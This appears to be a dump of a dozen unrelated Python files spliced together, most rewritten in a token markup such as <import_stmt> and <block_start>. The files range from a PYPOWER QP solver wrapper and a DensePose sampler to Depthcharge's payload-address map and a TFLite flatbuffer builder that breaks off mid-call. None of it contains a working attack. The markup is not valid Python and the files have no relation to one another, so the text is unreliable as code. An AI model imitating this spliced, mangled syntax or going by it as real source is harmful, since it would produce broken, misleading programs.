"""<import_stmt>numpy<as>np<import_from_stmt>PIL Image<import_from_stmt>..postprocessor Postprocessor<import_from_stmt>..representation StyleTransferAnnotation StyleTransferPrediction<import_from_stmt>..config NumberField<import_from_stmt>..utils get_size_from_config<class_stmt>ResizeStyleTransfer(Postprocessor)<block_start>__provider__='resize_style_transfer'<line_sep>annotation_types=(StyleTransferAnnotation )<line_sep>prediction_types=(StyleTransferPrediction )<line_sep>@classmethod<def_stmt>parameters cls<block_start>parameters=super().parameters()<line_sep>parameters.update({'dst_width':NumberField(value_type=int optional=<false> min_value=1 description="Destination width for resizing.") 'dst_height':NumberField(value_type=int optional=<false> min_value=1 description="Destination height for resizing.")})<line_sep><return>parameters<block_end><def_stmt>configure self<block_start>self.dst_height,self.dst_width=get_size_from_config(self.config allow_none=<true>)<block_end><def_stmt>process_image self annotation prediction<block_start><for_stmt>target annotation<block_start><if_stmt>target<is><none><block_start><continue><block_end>data=Image.fromarray(target.value)<line_sep>data=data.resize((self.dst_width self.dst_height) Image.BICUBIC)<line_sep>target.value=np.array(data)<block_end><return>annotation prediction<block_end><block_end> |
# Copyright (c) 1996-2015 PSERC. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
"""Quadratic Program Solver for PYPOWER.
"""<import_stmt>sys<import_from_stmt>pandapower.pypower.qps_pips qps_pips<line_sep>#from pandapower.pypower.qps_ipopt import qps_ipopt
#from pandapower.pypower.qps_cplex import qps_cplex
#from pandapower.pypower.qps_mosek import qps_mosek
#from pandapower.pypower.qps_gurobi import qps_gurobi
<import_from_stmt>pandapower.pypower.util have_fcn<def_stmt>qps_pypower H c=<none> A=<none> l=<none> u=<none> xmin=<none> xmax=<none> x0=<none> opt=<none><block_start>"""Quadratic Program Solver for PYPOWER.
A common wrapper function for various QP solvers.
Solves the following QP (quadratic programming) problem::
min 1/2 x'*H*x + c'*x
x
subject to::
l <= A*x <= u (linear constraints)
xmin <= x <= xmax (variable bounds)
Inputs (all optional except C{H}, C{c}, C{A} and C{l}):
- C{H} : matrix (possibly sparse) of quadratic cost coefficients
- C{c} : vector of linear cost coefficients
- C{A, l, u} : define the optional linear constraints. Default
values for the elements of C{l} and C{u} are -Inf and Inf,
respectively.
- C{xmin}, C{xmax} : optional lower and upper bounds on the
C{x} variables, defaults are -Inf and Inf, respectively.
- C{x0} : optional starting value of optimization vector C{x}
- C{opt} : optional options structure with the following fields,
all of which are also optional (default values shown in parentheses)
- C{alg} (0) - determines which solver to use
- 0 = automatic, first available of BPMPD_MEX, CPLEX,
Gurobi, PIPS
- 100 = BPMPD_MEX
- 200 = PIPS, Python Interior Point Solver
pure Python implementation of a primal-dual
interior point method
- 250 = PIPS-sc, a step controlled variant of PIPS
- 300 = Optimization Toolbox, QUADPROG or LINPROG
- 400 = IPOPT
- 500 = CPLEX
- 600 = MOSEK
- 700 = Gurobi
- C{verbose} (0) - controls level of progress output displayed
- 0 = no progress output
- 1 = some progress output
- 2 = verbose progress output
- C{max_it} (0) - maximum number of iterations allowed
- 0 = use algorithm default
- C{bp_opt} - options vector for BP
- C{cplex_opt} - options dict for CPLEX
- C{grb_opt} - options dict for gurobipy
- C{ipopt_opt} - options dict for IPOPT
- C{pips_opt} - options dict for L{qps_pips}
- C{mosek_opt} - options dict for MOSEK
- C{ot_opt} - options dict for QUADPROG/LINPROG
- C{problem} : The inputs can alternatively be supplied in a single
C{problem} dict with fields corresponding to the input arguments
described above: C{H, c, A, l, u, xmin, xmax, x0, opt}
Outputs:
- C{x} : solution vector
- C{f} : final objective function value
- C{exitflag} : exit flag
- 1 = converged
- 0 or negative values = algorithm specific failure codes
- C{output} : output struct with the following fields:
- C{alg} - algorithm code of solver used
- (others) - algorithm specific fields
- C{lmbda} : dict containing the Lagrange and Kuhn-Tucker
multipliers on the constraints, with fields:
- C{mu_l} - lower (left-hand) limit on linear constraints
- C{mu_u} - upper (right-hand) limit on linear constraints
- C{lower} - lower bound on optimization variables
- C{upper} - upper bound on optimization variables
Example from U{http://www.uc.edu/sashtml/iml/chap8/sect12.htm}:
>>> from numpy import array, zeros, Inf
>>> from scipy.sparse import csr_matrix
>>> H = csr_matrix(array([[1003.1, 4.3, 6.3, 5.9],
... [4.3, 2.2, 2.1, 3.9],
... [6.3, 2.1, 3.5, 4.8],
... [5.9, 3.9, 4.8, 10 ]]))
>>> c = zeros(4)
>>> A = csr_matrix(array([[1, 1, 1, 1 ],
... [0.17, 0.11, 0.10, 0.18]]))
>>> l = array([1, 0.10])
>>> u = array([1, Inf])
>>> xmin = zeros(4)
>>> xmax = None
>>> x0 = array([1, 0, 0, 1])
>>> solution = qps_pips(H, c, A, l, u, xmin, xmax, x0)
>>> round(solution["f"], 11) == 1.09666678128
True
>>> solution["converged"]
True
>>> solution["output"]["iterations"]
10
@author: <NAME> (PSERC Cornell)
"""<if_stmt>opt<is><none><block_start>opt={}<block_end># if x0 is None:
# x0 = array([])
# if xmax is None:
# xmax = array([])
# if xmin is None:
# xmin = array([])
## default options
<if_stmt>'alg'<in>opt<block_start>alg=opt['alg']<block_end><else_stmt><block_start>alg=0<block_end><if_stmt>'verbose'<in>opt<block_start>verbose=opt['verbose']<block_end><else_stmt><block_start>verbose=0<block_end>##----- call the appropriate solver -----
# if alg == 0 or alg == 200 or alg == 250: ## use MIPS or sc-MIPS
## set up options
<if_stmt>'pips_opt'<in>opt<block_start>pips_opt=opt['pips_opt']<block_end><else_stmt><block_start>pips_opt={}<block_end><if_stmt>'max_it'<in>opt<block_start>pips_opt['max_it']=opt['max_it']<block_end><if_stmt>alg<eq>200<block_start>pips_opt['step_control']=<false><block_end><else_stmt><block_start>pips_opt['step_control']=<true><block_end>pips_opt['verbose']=verbose<line_sep>## call solver
x,f,eflag,output,lmbda=qps_pips(H c A l u xmin xmax x0 pips_opt)<line_sep># elif alg == 400: ## use IPOPT
# x, f, eflag, output, lmbda = \
# qps_ipopt(H, c, A, l, u, xmin, xmax, x0, opt)
# elif alg == 500: ## use CPLEX
# x, f, eflag, output, lmbda = \
# qps_cplex(H, c, A, l, u, xmin, xmax, x0, opt)
# elif alg == 600: ## use MOSEK
# x, f, eflag, output, lmbda = \
# qps_mosek(H, c, A, l, u, xmin, xmax, x0, opt)
# elif 700: ## use Gurobi
# x, f, eflag, output, lmbda = \
# qps_gurobi(H, c, A, l, u, xmin, xmax, x0, opt)
# else:
# print('qps_pypower: {} is not a valid algorithm code\n'.format(alg))
<if_stmt>'alg'<not><in>output<block_start>output['alg']=alg<block_end><return>x f eflag output lmbda<block_end> |
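The doctest in the docstring exercises qps_pips directly; the same small problem can be pushed through this wrapper (which, with the alternative solvers commented out, always dispatches to PIPS). The snippet below simply mirrors the doctest's data.
from numpy import array, zeros, Inf
from scipy.sparse import csr_matrix

H = csr_matrix(array([[1003.1, 4.3, 6.3, 5.9],
                      [4.3, 2.2, 2.1, 3.9],
                      [6.3, 2.1, 3.5, 4.8],
                      [5.9, 3.9, 4.8, 10]]))
c = zeros(4)
A = csr_matrix(array([[1, 1, 1, 1],
                      [0.17, 0.11, 0.10, 0.18]]))
l = array([1, 0.10])
u = array([1, Inf])

x, f, exitflag, output, lmbda = qps_pypower(H, c, A, l, u,
                                            xmin=zeros(4),
                                            x0=array([1, 0, 0, 1]),
                                            opt={'verbose': 0})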
<import_from_stmt>six.moves urllib<def_stmt>web_socket_do_extra_handshake request<block_start>url_parts=urllib.parse.urlsplit(request.uri)<line_sep>max_age=""<if_stmt>"clear"<in>url_parts.query<block_start>max_age="; Max-Age=0"<block_end>value="1"<if_stmt>"value"<in>url_parts.query<block_start>value=urllib.parse.parse_qs(url_parts.query)["value"][0]<block_end>cookies=["samesite-unspecified={}; Path=/".format(value)+max_age "samesite-lax={}; Path=/; SameSite=Lax".format(value)+max_age "samesite-strict={}; Path=/; SameSite=Strict".format(value)+max_age # SameSite=None cookies must be Secure.
"samesite-none={}; Path=/; SameSite=None; Secure".format(value)+max_age]<for_stmt>cookie cookies<block_start>request.extra_headers.append(("Set-Cookie" cookie))<block_end><block_end><def_stmt>web_socket_transfer_data request# Expect close() from user agent.
<block_start>request.ws_stream.receive_message()<block_end> |
<import_stmt>pytest<import_stmt>numpy<as>np<import_stmt>moldesign<as>mdt<import_from_stmt>moldesign units<as>u<import_from_stmt>moldesign.interfaces.pyscf_interface basis_values<import_from_stmt>.molecule_fixtures *<import_from_stmt>. helpers<line_sep>__PYTEST_MARK__='wfn'<line_sep>TESTSYSTEMS=['h2_rhf_augccpvdz' 'h2_rhf_sto3g' 'acetylene_dft_631g']<def_stmt>test_pyscf_orbital_grid_works h2_rhf_augccpvdz<block_start>""" Tests the basic input/output of the pyscf basis_values function
Doesn't actually test the values directly - just that the answers are mathematically consistent
"""<line_sep>mol=h2_rhf_augccpvdz<line_sep>wfn=mol.wfn<line_sep>nbasis=len(wfn.aobasis)<line_sep>coords=u.array([mol.com np.zeros(3)<times>u.angstrom 10.0<times>np.ones(3)<times>u.angstrom np.ones(3)<times>u.nm])<line_sep># First - check that the shape is appropriate if called without orbital coefficients
values_nocoeffs=basis_values(mol wfn.aobasis coords)<assert_stmt>values_nocoeffs.shape<eq>(len(coords) nbasis)<assert_stmt>(values_nocoeffs[-1]<eq>values_nocoeffs[-2]).all()# these 2 coordinates are the same
# Second - explicitly send orbital coefficients for first 2 basis functions
coeffs=np.zeros((2 nbasis))<line_sep>coeffs[:2 :2]=np.identity(2)<line_sep>vals_b0=basis_values(mol wfn.aobasis coords coeffs=coeffs)<assert_stmt>vals_b0.shape<eq>(len(coords) len(coeffs))<line_sep>np.testing.assert_allclose(values_nocoeffs[: :2] vals_b0)<line_sep># Third - send symmetric and anti-symmetric combinations of basis functions and check answers
plusminus=np.zeros((2 nbasis))<line_sep>plusminus[:2 :2]=1.0/np.sqrt(2)<line_sep>plusminus[1 1]=-1.0/np.sqrt(2)<line_sep>vals_plusminus=basis_values(mol wfn.aobasis coords coeffs=plusminus)<assert_stmt>vals_plusminus.shape<eq>(len(coords) len(coeffs))<line_sep>helpers.assert_almost_equal(vals_plusminus[: 0] (vals_b0[: 0]+vals_b0[: 1])/np.sqrt(2))<line_sep>helpers.assert_almost_equal(vals_plusminus[: 1] (vals_b0[: 0]-vals_b0[: 1])/np.sqrt(2))<block_end>@pytest.mark.parametrize('molkey' TESTSYSTEMS)<def_stmt>test_basis_function_3d_grids_same_in_pyscf_and_mdt molkey request<block_start>mol=request.getfixturevalue(molkey)<line_sep>randocoords=6.0<times>u.angstrom<times>(np.random.rand(200 3)-0.5)<line_sep>pyscf_vals=basis_values(mol mol.wfn.aobasis randocoords)<with_stmt>np.errstate(under='ignore')<block_start>mdt_vals=mol.wfn.aobasis(randocoords)<block_end>helpers.assert_almost_equal(mdt_vals pyscf_vals decimal=5)<block_end>@pytest.mark.parametrize('molkey' ['h2_rhf_augccpvdz' 'h2_rhf_sto3g'])@pytest.mark.screening<def_stmt>test_pyscf_basis_function_space_integral_normalized molkey request<block_start>mol=request.getfixturevalue(molkey)<line_sep>grid=mdt.mathutils.padded_grid(mol.positions 8.0<times>u.angstrom npoints=150)<line_sep>points=grid.allpoints()<line_sep>pyscf_vals=basis_values(mol mol.wfn.aobasis points)<assert_stmt>pyscf_vals.shape<eq>(len(points) len(mol.wfn.aobasis))<line_sep>pyscf_normsqr=(pyscf_vals<power>2).sum(axis=0)<times>grid.dx<times>grid.dy<times>grid.dz<line_sep>helpers.assert_almost_equal(pyscf_normsqr 1.0 decimal=4)<block_end> |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
<import_stmt>matplotlib.pyplot<as>plt<import_stmt>seaborn<import_from_stmt>bezier _plot_helpers<import_from_stmt>tests.functional test_triangle_locate<import_from_stmt>tests.functional utils<def_stmt>make_plot triangle_index point_index save_plot<block_start>triangle=test_triangle_locate.TRIANGLES[triangle_index]<line_sep>point=test_triangle_locate.POINTS[: [point_index]]<line_sep>name=f"test_triangle{triangle_index}_and_point{point_index}"<line_sep>ax=triangle.plot(64)<line_sep>ax.plot(point[0 :] point[1 :] color="black" marker="o" linestyle="None")<line_sep>ax.axis("scaled")<line_sep>_plot_helpers.add_plot_boundary(ax)<if_stmt>save_plot<block_start>utils.save_fig(name)<block_end><else_stmt><block_start>plt.title(name.replace("_" r"\_"))<line_sep>plt.show()<block_end>plt.close(ax.figure)<block_end><def_stmt>main <block_start>parser=utils.get_parser()<line_sep>args=parser.parse_args()<for_stmt>case test_triangle_locate.CASES<block_start>triangle_index,point_index,_,_=case<line_sep>make_plot(triangle_index point_index args.save_plot)<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>seaborn.set()# Required in `seaborn >= 0.8`
main()<block_end> |
# SPDX-License-Identifier: BSD-3-Clause
# Depthcharge: <https://github.com/nccgroup/depthcharge>
"""
Implements PayloadMap - Although technically "public" this module
isn't documented in the API because its utility is tightly coupled
to internals of the Depthcharge class.
"""<import_from_stmt>. log<import_from_stmt>. builtin_payloads<import_from_stmt>.operation Operation<def_stmt>_load_builtins arch payloads:list exclude:set<block_start>"""
Load built-in payloads into `payloads`, excluding any whose
names appear in the `exclude` set.
"""<for_stmt>attr dir(builtin_payloads)<block_start><if_stmt><not>isinstance(attr str)<or>attr.startswith('_')<block_start><continue><block_end><if_stmt>attr<in>exclude<block_start><continue><block_end>payload_dict=getattr(builtin_payloads attr)<try_stmt><block_start>payload=payload_dict[arch.name.lower()]<line_sep>payloads.append((attr payload))<block_end><except_stmt>KeyError<block_start>msg='Payload "{:s}" not implemented for {:s}'<line_sep>log.warning(msg.format(attr arch.name))<block_end><block_end><block_end><class_stmt>PayloadMap<block_start>"""
Tracks locations of deployed payloads.
The current implementation is simple and allocates space for all payloads,
even if they do not ultimately need to be deployed and used.
"""<def_stmt>__init__ self arch base:int **kwargs<block_start>self._base=base<line_sep>self._off=0<line_sep>self._map={}<line_sep>self._align=kwargs.get('align' 16)<line_sep>self._skip_deploy=kwargs.get('skip_deploy' <false>)<line_sep>exclude_builtins=kwargs.get('exclude_builtins' <false>)<line_sep>excluded=kwargs.get('exclude' set())<line_sep>payloads=[]<line_sep># Aggregate built-in payloads
<if_stmt><not>exclude_builtins<block_start>_load_builtins(arch payloads excluded)<block_end># Aggregate user-provided payloads
user_payloads=kwargs.get('payloads' <none>)<if_stmt>user_payloads<block_start>payloads<augadd>user_payloads<block_end># Assign each payload to its corresponding location
<for_stmt>payload payloads<block_start>self.insert(payload[0] payload[1])<block_end><block_end><def_stmt>insert self name:str payload:bytes required_by=<none><block_start>"""
Insert a `payload`, identified by `name`, into the PayloadMap.
This will assign it the next available address in the map.
If `required_by` is specified, the payload's association to an
:py:class:`depthcharge.Operation` subclass will be recorded. This
information can be provided later via :py:meth:`mark_required_by`.
Returns `True` if the payload was added. If a payload with the same
name is already present, then `False` is returned. In this latter case,
the `required_by` information is still added to the corresponding
entry.
"""<if_stmt>name<not><in>self._map<block_start>address=self._base+self._off<line_sep>size=len(payload)<if_stmt>self._align<g>1<block_start>self._off<augadd>size+(self._align-1)<line_sep>self._off=(self._off<floordiv>self._align)<times>self._align<block_end><else_stmt><block_start>self._off<augadd>size<block_end>self._map[name]={'address':address 'deployed':<false> 'skip_deploy':self._skip_deploy 'data':payload 'size':size 'required_by':set()}<block_end><else_stmt><block_start>log.debug('{} is already in the PayloadMap'.format(name))<block_end><if_stmt>required_by<block_start>self.mark_required_by(name required_by)<block_end><block_end><def_stmt>__iter__ self<block_start><return>iter(self._map)<block_end><def_stmt>__getitem__ self name<block_start><try_stmt><block_start><return>self._map[name]<block_end><except_stmt>KeyError<block_start>msg='No such payload registered in PayloadMap: "{}"'.format(name)<line_sep><raise>KeyError(msg)<block_end><block_end>@property<def_stmt>base_address self<block_start>"""
This property specifies the base memory address at which payloads shall
be written.
"""<line_sep><return>self._base<block_end><def_stmt>mark_deployed self name state=<true><block_start>"""
Mark the payload referred to by `name` as being deployed.
"""<line_sep>payload=self._map[name]<line_sep>payload['deployed']=state<block_end><def_stmt>mark_required_by self payload_name:str operation<block_start>"""
Mark the payload referred to by `name` as being required by
the specified `operation`, which may be the operation
name (str) or an instance of an Operation subclass.
A list of str or Operation instances is also permitted.
"""<if_stmt>isinstance(operation list)<block_start><for_stmt>op_entry operation<block_start>self.mark_required_by(payload_name op_entry)<block_end><return><block_end><if_stmt>isinstance(operation Operation)<block_start>operation=operation.name<block_end><elif_stmt><not>isinstance(operation str)<block_start>msg='Expected operation argument to be str, Operation, or list. Got {:s}'<line_sep><raise>TypeError(msg.format(type(operation).__name__))<block_end>self._map[payload_name]['required_by'].add(operation)<block_end><block_end> |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# @Author:梨花菜
# @File: relation.py
# @Time : 2019/5/27 10:16
# @Email: <EMAIL>
# @Software: PyCharm
# Mapping between api modules and the relation field of the api table in the database
API_RELATION={"default":66 "energy.ball":67 "manage":68 "app_manage":68 "artisan":69 "goods":70 "member":71 "order":72 "seller":73 "payment":74 "martketing":75 "promotion":76 "purchase":77 "security":78 "logistics":79 "recycle":80 "image-search":81 "content":82 "bmpm":83 "bi":84}<line_sep># Java同学项目分组
API_AUTHOR={"default":1 "tangzhu":85 "xuqirong":86 "zhanghengjian":87 "fengzhenwen":88 "lingyunlong":89 "chencanzhang":90}<line_sep>NIL='无参数'<line_sep>SIGN='time,rode,sign'<line_sep>SIGN_OR_TOKEN=SIGN+'(wb-token可选)'<line_sep>SIGN_AND_TOKEN=SIGN+',wb-token'<line_sep>SESSION='cookie: wb_sess:xxxxxx'<line_sep>COOKIE='cookie: wbiao.securityservice.tokenid:xxxx'<line_sep>API_AUTH={"0":["NIL" NIL] "1":["APP_GENERAL_AUTH" SIGN] "2":["WXMP_GENERAL_AUTH" SIGN] "3":["APP_MEMBER_AUTH" SIGN_AND_TOKEN] "4":["APP_MEMBER_COMPATIBILITY_AUTH" SIGN_OR_TOKEN] "5":["WXMP_MEMBER_AUTH" SIGN_AND_TOKEN] "6":["WXMP_MEMBER_COMPATIBILITY_AUTH" SIGN_OR_TOKEN] "7":["APP_USER_AUTH" SIGN_AND_TOKEN] "8":["APP_USER_COMPATIBILITY_AUTH" SIGN_OR_TOKEN] "9":["WXMP_USER_AUTH" SIGN_AND_TOKEN] "10":["WXMP_USER_COMPATIBILITY_AUTH" SIGN_OR_TOKEN] "11":["WXMP_MEMBER_COMPATIBILITY_AUTH" SESSION] "12":["PM_USER_AUTH" COOKIE] "13":["BACK_USER_AUTH" COOKIE] "14":["APP_NIL" NIL] "15":["WXMP_NIL" NIL] "16":["PM_NIL" NIL] }<line_sep> |
<import_from_stmt>huobi.client.generic GenericClient<import_from_stmt>huobi.utils *<line_sep>generic_client=GenericClient()<line_sep>list_obj=generic_client.get_exchange_info()<line_sep>LogInfo.output("---- Supported symbols ----")<for_stmt>symbol list_obj.symbol_list<block_start>LogInfo.output(symbol.symbol)<block_end>LogInfo.output("---- Supported currencies ----")<for_stmt>currency list_obj.currencies<block_start>LogInfo.output(currency)<block_end> |
"""Like source.py, but uses streams."""<import_from_future_stmt> print_function<import_stmt>argparse<import_stmt>sys<import_from_stmt>trollius *<import_from_stmt>trollius test_utils<line_sep>ARGS=argparse.ArgumentParser(description="TCP data sink example.")<line_sep>ARGS.add_argument('--tls' action='store_true' dest='tls' default=<false> help='Use TLS')<line_sep>ARGS.add_argument('--iocp' action='store_true' dest='iocp' default=<false> help='Use IOCP event loop (Windows only)')<line_sep>ARGS.add_argument('--stop' action='store_true' dest='stop' default=<false> help='Stop the server by sending it b"stop" as data')<line_sep>ARGS.add_argument('--host' action='store' dest='host' default='127.0.0.1' help='Host name')<line_sep>ARGS.add_argument('--port' action='store' dest='port' default=1111 type=int help='Port number')<line_sep>ARGS.add_argument('--size' action='store' dest='size' default=16<times>1024 type=int help='Data size')<class_stmt>Debug<block_start>"""A clever little class that suppresses repetitive messages."""<line_sep>overwriting=<false><line_sep>label='stream1:'<def_stmt>print_ self *args<block_start><if_stmt>self.overwriting<block_start>print(file=sys.stderr)<line_sep>self.overwriting=0<block_end>print(self.label *args file=sys.stderr)<block_end><def_stmt>oprint self *args<block_start>self.overwriting<augadd>1<line_sep>end='\n'<if_stmt>self.overwriting<ge>3<block_start><if_stmt>self.overwriting<eq>3<block_start>print(self.label '[...]' file=sys.stderr)<block_end>end='\r'<block_end>print(self.label *args file=sys.stderr end=end)<line_sep>sys.stdout.flush()<block_end><block_end>@coroutine<def_stmt>start loop args<block_start>d=Debug()<line_sep>total=0<line_sep>sslctx=<none><if_stmt>args.tls<block_start>d.print_('using dummy SSLContext')<line_sep>sslctx=test_utils.dummy_ssl_context()<block_end>r,w=<yield>From(open_connection(args.host args.port ssl=sslctx))<line_sep>d.print_('r =' r)<line_sep>d.print_('w =' w)<if_stmt>args.stop<block_start>w.write(b'stop')<line_sep>w.close()<block_end><else_stmt><block_start>size=args.size<line_sep>data=b'x'<times>size<try_stmt><block_start><while_stmt><true><block_start>total<augadd>size<line_sep>d.oprint('writing' size 'bytes; total' total)<line_sep>w.write(data)<line_sep>f=w.drain()<if_stmt>f<block_start>d.print_('pausing')<line_sep><yield>From(f)<block_end><block_end><block_end><except_stmt>(ConnectionResetError BrokenPipeError)<as>exc<block_start>d.print_('caught' repr(exc))<block_end><block_end><block_end><def_stmt>main <block_start><global>args<line_sep>args=ARGS.parse_args()<if_stmt>args.iocp<block_start><import_from_stmt>trollius.windows_events ProactorEventLoop<line_sep>loop=ProactorEventLoop()<line_sep>set_event_loop(loop)<block_end><else_stmt><block_start>loop=get_event_loop()<block_end><try_stmt><block_start>loop.run_until_complete(start(loop args))<block_end><finally_stmt><block_start>loop.close()<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>main()<block_end> |
# Copyright (c) Facebook, Inc. and its affiliates.
<import_stmt>random<import_from_stmt>typing Optional Tuple<import_stmt>torch<import_from_stmt>densepose.converters ToChartResultConverterWithConfidences<import_from_stmt>.densepose_base DensePoseBaseSampler<class_stmt>DensePoseConfidenceBasedSampler(DensePoseBaseSampler)<block_start>"""
Samples DensePose data from DensePose predictions.
Samples for each class are drawn using confidence value estimates.
"""<def_stmt>__init__ self confidence_channel:str count_per_class:int=8 search_count_multiplier:Optional[float]=<none> search_proportion:Optional[float]=<none> <block_start>"""
Constructor
Args:
confidence_channel (str): confidence channel to use for sampling;
possible values:
"sigma_2": confidences for UV values
"fine_segm_confidence": confidences for fine segmentation
"coarse_segm_confidence": confidences for coarse segmentation
(default: "sigma_2")
count_per_class (int): the sampler produces at most `count_per_class`
samples for each category (default: 8)
search_count_multiplier (float or None): if not None, the total number
of the most confident estimates of a given class to consider is
defined as `min(search_count_multiplier * count_per_class, N)`,
where `N` is the total number of estimates of the class; cannot be
specified together with `search_proportion` (default: None)
search_proportion (float or None): if not None, the total number
of the most confident estimates of a given class to consider is
defined as `min(max(search_proportion * N, count_per_class), N)`,
where `N` is the total number of estimates of the class; cannot be
specified together with `search_count_multiplier` (default: None)
"""<line_sep>super().__init__(count_per_class)<line_sep>self.confidence_channel=confidence_channel<line_sep>self.search_count_multiplier=search_count_multiplier<line_sep>self.search_proportion=search_proportion<assert_stmt>(search_count_multiplier<is><none>)<or>(search_proportion<is><none>) (f"Cannot specify both search_count_multiplier (={search_count_multiplier})"<concat>f"and search_proportion (={search_proportion})")<block_end><def_stmt>_produce_index_sample self values:torch.Tensor count:int<block_start>"""
Produce a sample of indices to select data based on confidences
Args:
values (torch.Tensor): an array of size [n, k] that contains
estimated values (U, V, confidences);
n: number of channels (U, V, confidences)
k: number of points labeled with part_id
count (int): number of samples to produce, should be positive and <= k
Return:
list(int): indices of values (along axis 1) selected as a sample
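Example (illustrative numbers only): with count=8 and
search_count_multiplier=3, the min(24, k) points with the lowest values
in the confidence channel are kept and 8 indices are drawn from them
uniformly at random; with search_proportion=0.1 and k=500, the candidate
pool would instead hold min(max(50, 8), 500) = 50 points.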
"""<line_sep>k=values.shape[1]<if_stmt>k<eq>count<block_start>index_sample=list(range(k))<block_end><else_stmt># take the best count * search_count_multiplier pixels,
# sample from them uniformly
# (here best = smallest variance)
<block_start>_,sorted_confidence_indices=torch.sort(values[2])<if_stmt>self.search_count_multiplier<is><not><none><block_start>search_count=min(int(count<times>self.search_count_multiplier) k)<block_end><elif_stmt>self.search_proportion<is><not><none><block_start>search_count=min(max(int(k<times>self.search_proportion) count) k)<block_end><else_stmt><block_start>search_count=min(count k)<block_end>sample_from_top=random.sample(range(search_count) count)<line_sep>index_sample=sorted_confidence_indices[:search_count][sample_from_top]<block_end><return>index_sample<block_end><def_stmt>_produce_labels_and_results self instance<arrow>Tuple[torch.Tensor torch.Tensor]<block_start>"""
Method to get labels and DensePose results from an instance, with confidences
Args:
instance (Instances): an instance of `DensePoseChartPredictorOutputWithConfidences`
Return:
labels (torch.Tensor): shape [H, W], DensePose segmentation labels
dp_result (torch.Tensor): shape [3, H, W], DensePose results u and v
stacked with the confidence channel
"""<line_sep>converter=ToChartResultConverterWithConfidences<line_sep>chart_result=converter.convert(instance.pred_densepose instance.pred_boxes)<line_sep>labels,dp_result=chart_result.labels.cpu() chart_result.uv.cpu()<line_sep>dp_result=torch.cat((dp_result getattr(chart_result self.confidence_channel)[<none>].cpu()))<line_sep><return>labels dp_result<block_end><block_end> |
<import_stmt>pickle<import_stmt>supriya<def_stmt>test_01 <block_start>old_session=supriya.Session()<line_sep>new_session=pickle.loads(pickle.dumps(old_session))<line_sep>old_bundles=old_session.to_osc_bundles()<line_sep>new_bundles=new_session.to_osc_bundles()<assert_stmt>old_bundles<eq>new_bundles<block_end><def_stmt>test_02 <block_start>old_session=supriya.Session()<line_sep>group=old_session.add_group(offset=5)<line_sep>group.add_synth(offset=10 duration=10)<line_sep>new_session=pickle.loads(pickle.dumps(old_session))<line_sep>old_bundles=old_session.to_osc_bundles()<line_sep>new_bundles=new_session.to_osc_bundles()<assert_stmt>old_bundles<eq>new_bundles<block_end> |
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utility functions that support testing.
All functions that can be commonly used by various tests.
"""<import_stmt>flatbuffers<import_from_stmt>tensorflow.lite.python schema_py_generated<as>schema_fb<line_sep>TFLITE_SCHEMA_VERSION=3<def_stmt>build_mock_flatbuffer_model <block_start>"""Creates a flatbuffer containing an example model."""<line_sep>builder=flatbuffers.Builder(1024)<line_sep>schema_fb.BufferStart(builder)<line_sep>buffer0_offset=schema_fb.BufferEnd(builder)<line_sep>schema_fb.BufferStartDataVector(builder 10)<line_sep>builder.PrependUint8(9)<line_sep>builder.PrependUint8(8)<line_sep>builder.PrependUint8(7)<line_sep>builder.PrependUint8(6)<line_sep>builder.PrependUint8(5)<line_sep>builder.PrependUint8(4)<line_sep>builder.PrependUint8(3)<line_sep>builder.PrependUint8(2)<line_sep>builder.PrependUint8(1)<line_sep>builder.PrependUint8(0)<line_sep>buffer1_data_offset=builder.EndVector(10)<line_sep>schema_fb.BufferStart(builder)<line_sep>schema_fb.BufferAddData(builder buffer1_data_offset)<line_sep>buffer1_offset=schema_fb.BufferEnd(builder)<line_sep>schema_fb.BufferStart(builder)<line_sep>buffer2_offset=schema_fb.BufferEnd(builder)<line_sep>schema_fb.ModelStartBuffersVector(builder 3)<line_sep>builder.PrependUOffsetTRelative(buffer2_offset)<line_sep>builder.PrependUOffsetTRelative(buffer1_offset)<line_sep>builder.PrependUOffsetTRelative(buffer0_offset)<line_sep>buffers_offset=builder.EndVector(3)<line_sep>string0_offset=builder.CreateString('input_tensor')<line_sep>schema_fb.TensorStartShapeVector(builder 3)<line_sep>builder.PrependInt32(1)<line_sep>builder.PrependInt32(2)<line_sep>builder.PrependInt32(5)<line_sep>shape0_offset=builder.EndVector(3)<line_sep>schema_fb.TensorStart(builder)<line_sep>schema_fb.TensorAddName(builder string0_offset)<line_sep>schema_fb.TensorAddShape(builder shape0_offset)<line_sep>schema_fb.TensorAddType(builder 0)<line_sep>schema_fb.TensorAddBuffer(builder 0)<line_sep>tensor0_offset=schema_fb.TensorEnd(builder)<line_sep>schema_fb.QuantizationParametersStartMinVector(builder 5)<line_sep>builder.PrependFloat32(0.5)<line_sep>builder.PrependFloat32(2.0)<line_sep>builder.PrependFloat32(5.0)<line_sep>builder.PrependFloat32(10.0)<line_sep>builder.PrependFloat32(20.0)<line_sep>quant1_min_offset=builder.EndVector(5)<line_sep>schema_fb.QuantizationParametersStartMaxVector(builder 5)<line_sep>builder.PrependFloat32(10.0)<line_sep>builder.PrependFloat32(20.0)<line_sep>builder.PrependFloat32(-50.0)<line_sep>builder.PrependFloat32(1.0)<line_sep>builder.PrependFloat32(2.0)<line_sep>quant1_max_offset=builder.EndVector(5)<line_sep>schema_fb.QuantizationParametersStartScaleVector(builder 